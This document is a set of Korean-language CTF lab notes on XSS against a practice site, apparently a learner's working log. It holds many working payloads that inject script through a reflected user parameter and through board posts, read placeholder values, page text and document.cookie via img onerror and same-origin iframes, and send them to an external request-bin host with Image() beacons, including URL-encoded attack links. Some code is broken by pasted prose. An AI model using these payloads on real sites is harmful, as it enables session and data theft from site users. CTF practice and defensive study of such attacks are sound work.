CTF ClientScript
Basic Script Prac
id,pw로 로그인
마이페이지 접속
<input name = "info" type = "text" placeholder="Flag Here..!"/>
placeholder값 가져오기
xss point
GET /scriptBasic/mypage.php?user=iddddd
->
<input name = "id" type = "text" placeholder="iddddd"/>
user= "/> <script> var a = document.getElementsByName('info').innerHTML ; console.log(a); </script>//
-> getElementsByName은 배열이므로 [0]을 사용해서 첫 번째 요소를 선택해야 한다
user="/> <script> var a = document.getElementsByName('info')[0].innerHTML; console.log(a); </script>//
-> 가져올 요소 값이 xss point 뒤에 존재해 img 태그 이용
user="/> <img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder; console.log(secretData);"/>//
-> Flag Here..! 값 출력
user="/> <script>
// Read the placeholder of the first element named "info" (the input shown at the top of these notes).
var secretData = document.getElementsByName('info')[0].placeholder;
// Assigning an external URL to an Image() makes the browser issue a GET that carries
// secretData in the query string; the same beacon pattern is reused throughout these notes.
var i = new Image();
i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+secretData;
// NOTE(review): the notes record this variant as not working. The earlier remark that the
// target element sits after the injection point suggests an inline <script> runs before that
// element is parsed, so [0] is presumably undefined here — confirm.
// Defender side: HTML-attribute-encoding the reflected `user` value removes the injection,
// and a CSP img-src allowlist would block this beacon destination.
</script>
안됨
user="/> <img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder; var i = new Image();
i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+secretData;"/>//
user="/><img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder;console.log(secretData); var i = new Image();
i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+secretData;"/>//
http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%22%76%61%72%20%73%65%63%72%65%74%44%61%74%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%4e%61%6d%65%28%27%69%6e%66%6f%27%29%5b%30%5d%2e%70%6c%61%63%65%68%6f%6c%64%65%72%3b%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%65%63%72%65%74%44%61%74%61%29%3b%20%76%61%72%20%69%20%3d%20%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%0a%69%2e%73%72%63%20%3d%22%68%74%74%70%73%3a%2f%2f%65%6e%36%69%6c%61%6b%34%75%36%70%64%39%2e%78%2e%70%69%70%65%64%72%65%61%6d%2e%6e%65%74%2f%3f%73%65%63%72%65%74%44%61%74%61%3d%22%2b%73%65%63%72%65%74%44%61%74%61%3b%22%2f%3e%2f%2f
user="/><img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder;var a=console.log(secretData); var i = new Image(); i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+a;"/>//
"/><img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder; var i = new Image(); i.src ='https://en6ilak4u6pd9.x.pipedream.net/?secretData='+secretData;"/>
http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%22%76%61%72%20%73%65%63%72%65%74%44%61%74%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%4e%61%6d%65%28%27%69%6e%66%6f%27%29%5b%30%5d%2e%70%6c%61%63%65%68%6f%6c%64%65%72%3b%20%76%61%72%20%69%20%3d%20%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%20%69%2e%73%72%63%20%3d%27%ff%68%74%74%70%73%3a%2f%2f%65%6e%36%69%6c%61%6b%34%75%36%70%64%39%2e%78%2e%70%69%70%65%64%72%65%61%6d%2e%6e%65%74%2f%3f%73%65%63%72%65%74%44%61%74%61%3d%27%2b%73%65%63%72%65%74%44%61%74%61%3b%22%2f%3e
"/><img src=x onerror="var secretData=document.getElementsByName('info')[0].placeholder; var i = new Image(); i.src ='https://en6ilak4u6pd9.x.pipedream.net/?secretData='+secretData;
http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%22%76%61%72%20%73%65%63%72%65%74%44%61%74%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%4e%61%6d%65%28%27%69%6e%66%6f%27%29%5b%30%5d%2e%70%6c%61%63%65%68%6f%6c%64%65%72%3b%20%76%61%72%20%69%20%3d%20%6e%65%77%20%49%6d%61%67%65%28%29%3b%20%20%69%2e%73%72%63%20%3d%27%68%74%74%70%73%3a%2f%2f%65%6e%36%69%6c%61%6b%34%75%36%70%64%39%2e%78%2e%70%69%70%65%64%72%65%61%6d%2e%6e%65%74%2f%3f%73%65%63%72%65%74%44%61%74%61%3d%27%2b%73%65%63%72%65%74%44%61%74%61%3b
따옴표를 엄청 주의해야겠다 꺾
Steal Info
<iframe src="http://~~mypage.php" id="targetFrame"></iframe>
<script>
// Look up the embedded frame and take a handle to its document.
// contentDocument is readable only while the frame is same-origin with this page; for a
// cross-origin frame it is null. This script runs during parsing, before the frame has
// finished loading, so at this point it likely refers to the initial blank document — confirm.
var targetTag =
document.getElementById('targetFrame');
var DOMData= targetTag.contentDocument;
</script>
- URL 뒤에 #이 붙을 때 그 이후의 값은 서버에 전달되지 않는다
- # 뒤는 프래그먼트(fragment)로 처리되어 URL에는 포함되지만 서버에는 전달되지 않는다
<iframe src="http://ctf.segfaulthub.com:4343/scriptPrac/secret.php" id="targetFrame"></iframe>
<script>
// Same frame-handle pattern as above: contentDocument is only readable same-origin,
// and this runs before the frame's load event, so the document is likely still blank.
var targetTag =document.getElementById('targetFrame');
var DOMData= targetTag.contentDocument;
// NOTE(review): "colsole" is a typo for "console"; as written this line throws a
// ReferenceError and nothing is logged, which would explain the confusion noted below.
colsole.log(DOMData)
</script>
관리자의 쿠키를 빼와서 접속해야하나?
어디가 xss point인지 모르겠다
콘솔에
<p class="card-text">This is a Very Secret Info.</p>
var secretData = document.getElementsByClassName('card-text')[1].innerHTML; console.log(secretData);
This is a Very Secret Info. 출력
xss point
탈취페이지
<p class="card-text">This is a Very Secret Info.</p>
콘솔에
var secretData = document.getElementsByClassName('card-text')[1].innerHTML; console.log(secretData);
This is a Very Secret Info. 출력
게시판 뷰 페이지의 content
<iframe src="http://ctf.segfaulthub.com:4343/scriptPrac/secret.php" id="targetFrame"/>
<script>
// NOTE(review): <iframe> is not a void element, so the "/>" above is ignored by the HTML parser
// and everything up to a closing </iframe> (which never appears) is likely treated as the frame's
// fallback text — this <script> would then never execute. The next version in these notes
// adds a proper closing tag and an onload handler.
var targetTag =document.getElementById('targetFrame');
var DOMData= targetTag.contentDocument;
// Reads the second .card-text element of the framed page (index [1]); requires same-origin
// access and a fully loaded frame, neither of which is guaranteed at this point.
var secretData=DOMData.getElementsByClassName('card-text')[1].innerHTML;
// Image() beacon carrying the value in the query string (not URL-encoded here).
var i = new Image();
i.src ="https://en6ilak4u6pd9.x.pipedream.net/?secretData="+secretData;
</script>
<iframe src="http://ctf.segfaulthub.com:4343/scriptPrac/secret.php" id="targetFrame" onload="loadIframeContent()"></iframe>
<script>
// Runs once the frame's load event fires, so the framed document is complete by then.
function loadIframeContent() {
var targetTag = document.getElementById('targetFrame');
// Check if iframe content is loaded
// contentDocument is truthy only when the frame is same-origin; this guard is what makes the
// read possible at all, and is why embedding the page elsewhere would not work.
if (targetTag.contentDocument) {
var DOMData = targetTag.contentDocument;
// Second .card-text element of the framed page (see the <p class="card-text"> noted above).
var secretData = DOMData.getElementsByClassName('card-text')[1].innerHTML;
// URL 인코딩 적용  (apply URL encoding)
// NOTE(review): the next three lines are pasted notes, not code; this function does not parse as written.
URL에서 데이터를 전송할 때 인코딩을 사용하는 것은 안전성과 일관성을 유지하기 위한 좋은 실천 방법입니다. 특히, URL에 포함된 데이터에는 일부 특수 문자나 공백 등이 있을 수 있으며, 이러한 문자들은 URL에서 특별한 의미를 가지는 문자로 간주될 수 있습니다.
인코딩을 통해 이러한 문자들을 안전하게 전송 가능한 형태로 변환할 수 있습니다. 특히, URL 인코딩은 공백을 %20과 같이 변환하고, 특수 문자를 그에 상응하는 인코딩 값으로 변환합니다.
만약 데이터에 공백이나 특수 문자가 포함되어 있다면, 이러한 문자를 인코딩하지 않고 URL에 포함시키면 올바른 동작을 기대하기 어렵습니다. 특히, HTTP GET 요청의 경우 URL에 데이터를 포함시키기 때문에 안전성이 더욱 중요합니다.
// Percent-encode so spaces and reserved characters survive the query string intact.
secretData = encodeURIComponent(secretData);
// Image() beacon: the browser issues a GET to the external host with the value as a query parameter.
// Defender side: this is stored XSS via board content — output-encode the content on render,
// and a CSP img-src allowlist stops the beacon even if the injection succeeds.
var i = new Image();
i.src = "https://en6ilak4u6pd9.x.pipedream.net/?secretData=" + secretData;
}
}
</script>
글 내용으로 위의 것을 작성하고
뷰 링크를 보내면 성공
Steal Info 2
게시판 내용
<script>
// document.cookie returns every cookie for this origin that is not flagged HttpOnly;
// the result recorded below shows the flag cookie was readable from script.
// Defender side: marking session/flag cookies HttpOnly removes them from document.cookie,
// and a CSP img-src allowlist blocks the Image() beacon used here.
var cookieData = document.cookie;
var i = new Image();
i.src = "http://en6ilak4u6pd9.x.pipedream.net/?cookie=" + cookieData;
</script>
/?cookie=flag=flag_userId
<iframe src="http://ctf.segfaulthub.com:4343/scriptPrac2/mypage.php?flag=flag_userId" id="targetFrame" onload="loadIframeContent()"></iframe>
<script>
// Runs after the frame's load event, so the framed page is fully parsed before it is read.
function loadIframeContent() {
var targetTag = document.getElementById('targetFrame');
// Check if iframe content is loaded
// Truthy only for a same-origin frame; a cross-origin frame exposes no document here.
if (targetTag.contentDocument) {
var DOMData = targetTag.contentDocument;
// Reads the placeholder attribute of the framed page's #userInfo element.
// Defender side: sensitive values should not be rendered into page markup at all; if they must
// be, output-encoding the board content that carries this script prevents it from running.
var secretData = DOMData.getElementById('userInfo').placeholder;
// URL 인코딩 적용  (apply URL encoding so reserved characters survive the query string)
secretData = encodeURIComponent(secretData);
// Image() beacon to the external host; a CSP img-src allowlist would block this destination.
var i = new Image();
i.src = "https://en6ilak4u6pd9.x.pipedream.net/?secretData=" + secretData;
}
}
</script>
됐다